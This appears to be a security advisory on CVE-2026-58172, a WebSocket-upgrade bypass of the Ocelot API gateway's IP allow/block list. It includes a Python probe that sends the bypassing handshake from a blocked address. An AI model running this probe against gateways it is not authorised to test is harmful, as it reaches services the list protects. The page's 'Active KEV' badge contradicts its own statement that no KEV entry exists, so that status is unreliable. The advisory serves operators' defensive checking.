⚡ Active KEV CVE-2026-58172 2026-06-30

Ocelot API Gateway IP Allow/Block List Bypass via WebSocket Upgrade (CVE-2026-58172)

A critical security control bypass in the Ocelot API gateway lets denied clients evade IP-based access restrictions by sending WebSocket upgrade requests.

What Is It

CVE-2026-58172 is a security control bypass (CWE-288, Authentication Bypass Using an Alternate Path or Channel) in ThreeMammals' Ocelot, an open-source .NET API gateway. In OcelotPipelineExtensions.cs the middleware pipeline is split with MapWhen, and the branch that handles WebSocket upgrade requests omits SecurityMiddleware, the component that enforces the configured IP allow/block list. Any request carrying a WebSocket upgrade is therefore routed around the check: a client whose address is blocked, or absent from the allow list, has its traffic proxied to the downstream service exactly as a permitted client's would be. The flaw affects Ocelot through version 24.1.0.

Why It Matters

The vulnerability carries a CVSS 3.1 base score of 9.1 (CRITICAL) with vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N; the secondary CVSS 4.0 score is 9.3. It is exploitable over the network at low attack complexity, requires no privileges and no user interaction, and yields high confidentiality and integrity impact (availability is not affected and scope is unchanged). An IP allow/block list is a core defense for gateways fronting internal services; here it is circumvented by adding two request headers, so every downstream service that operators believe is shielded by that list is reachable by any client that can open a WebSocket handshake to the gateway.

What's Vulnerable

The supplied data lists no affected CPEs; the affected range is stated only as Ocelot versions through 24.1.0. Exposure requires both conditions together: the gateway runs an affected version, and it relies on Ocelot's own IP allow/block list to restrict who may reach downstream services. Deployments that do not configure IP-based allow/block enforcement are outside the scope of this specific bypass. The flaw evades only the check performed inside Ocelot, so a client already dropped by a network firewall or a proxy in front of the gateway never reaches the vulnerable branch.
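The mechanism described under "What Is It" and the scope described above suggest a direct test an operator can run from an address the gateway should reject: send the same path once as a plain GET and once as an RFC 6455 WebSocket handshake, and compare the two outcomes. The probe below is an added example written for this page, not code from the Ocelot project or the advisory. It assumes that the gateway signals an IP-policy rejection with a 401 or 403 (the page does not state which code SecurityMiddleware returns, so both are treated as enforcement), and the sample responses in `demo()` are constructed, not captured from a real gateway.

```python
"""Probe a gateway for the CVE-2026-58172 WebSocket-upgrade bypass.

Run from a client address that the gateway's IP allow/block list is
supposed to reject.  A plain GET exercises the normal pipeline branch; a
WebSocket opening handshake exercises the MapWhen upgrade branch.  If the
first is denied and the second is not, the upgrade branch is skipping the
IP policy.
"""
import base64
import hashlib
import os
import socket
from typing import Dict, Optional, Tuple

# Assumption: either of these codes means "rejected by the gateway's IP policy".
DENIED = frozenset({401, 403})

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # RFC 6455 handshake GUID


def build_plain_request(host: str, path: str) -> bytes:
    """Ordinary HTTP/1.1 GET; goes through the gateway's normal pipeline branch."""
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()


def build_upgrade_request(host: str, path: str, key: Optional[str] = None) -> bytes:
    """RFC 6455 opening handshake for the same path; selects the upgrade branch."""
    if key is None:
        key = base64.b64encode(os.urandom(16)).decode()
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Key: {key}\r\n"
        "Sec-WebSocket-Version: 13\r\n\r\n"
    ).encode()


def expected_accept(key: str) -> str:
    """Sec-WebSocket-Accept a genuine WebSocket server must return for `key`."""
    return base64.b64encode(hashlib.sha1((key + WS_GUID).encode()).digest()).decode()


def parse_response(raw: bytes) -> Tuple[int, Dict[str, str]]:
    """Return (status code, lower-cased header map) from an HTTP/1.1 response head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def classify(plain_status: int, upgrade_status: int) -> str:
    """bypass: GET denied but upgrade not denied (the CVE-2026-58172 pattern).
    enforced: both denied, so the upgrade branch runs the IP policy.
    not-restricted: the GET itself was not denied, so this client is not
    subject to the list and the probe says nothing about the bypass."""
    if plain_status not in DENIED:
        return "not-restricted"
    if upgrade_status in DENIED:
        return "enforced"
    return "bypass"


def _exchange(host: str, port: int, request: bytes, timeout: float) -> bytes:
    """Send one request and read until the end of the response head."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        buf = b""
        while b"\r\n\r\n" not in buf:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return buf


def probe(host: str, port: int, path: str = "/", timeout: float = 5.0):
    """Live check. Returns (verdict, plain_status, upgrade_status, genuine_ws);
    genuine_ws is True only if the 101 carried the correct Sec-WebSocket-Accept,
    i.e. a real WebSocket endpoint behind the gateway answered the handshake."""
    plain_status, _ = parse_response(_exchange(host, port, build_plain_request(host, path), timeout))
    key = base64.b64encode(os.urandom(16)).decode()
    upgrade_status, hdrs = parse_response(
        _exchange(host, port, build_upgrade_request(host, path, key), timeout))
    genuine_ws = upgrade_status == 101 and hdrs.get("sec-websocket-accept") == expected_accept(key)
    return classify(plain_status, upgrade_status), plain_status, upgrade_status, genuine_ws


def demo() -> str:
    """Constructed sample: the gateway denies the GET but completes the upgrade."""
    plain = b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n"
    key = "dGhlIHNhbXBsZSBub25jZQ=="  # the RFC 6455 example key
    upgrade = ("HTTP/1.1 101 Switching Protocols\r\nUpgrade: websocket\r\n"
               "Connection: Upgrade\r\n"
               f"Sec-WebSocket-Accept: {expected_accept(key)}\r\n\r\n").encode()
    return classify(parse_response(plain)[0], parse_response(upgrade)[0])


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1], int(sys.argv[2]), sys.argv[3] if len(sys.argv) > 3 else "/"))
```

Run it as `python probe.py gateway.internal 80 /some/route` from a blocked address; a verdict of `bypass` with `genuine_ws` True means the handshake was answered by a downstream WebSocket endpoint, while `bypass` with a 2xx or 5xx upgrade status means the request was proxied but the downstream route is not a WebSocket service. Repeat after upgrading: the same probe should then report `enforced`.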

Patch Status

The issue is fixed in commit f156fd4017ca25025fffdad8ec56c1d657dfb402, delivered via pull request #2406, which restores security enforcement on the WebSocket upgrade path so the allow/block list is applied there as well. Operators should upgrade to a release that contains this commit. Because the bypass evades only the check performed inside Ocelot, a network-level control in front of the gateway that rejects the same client addresses closes the gap in the meantime. No CISA KEV entry was supplied for this CVE, so the provided source material gives no confirmation of active exploitation and no required-action due date.
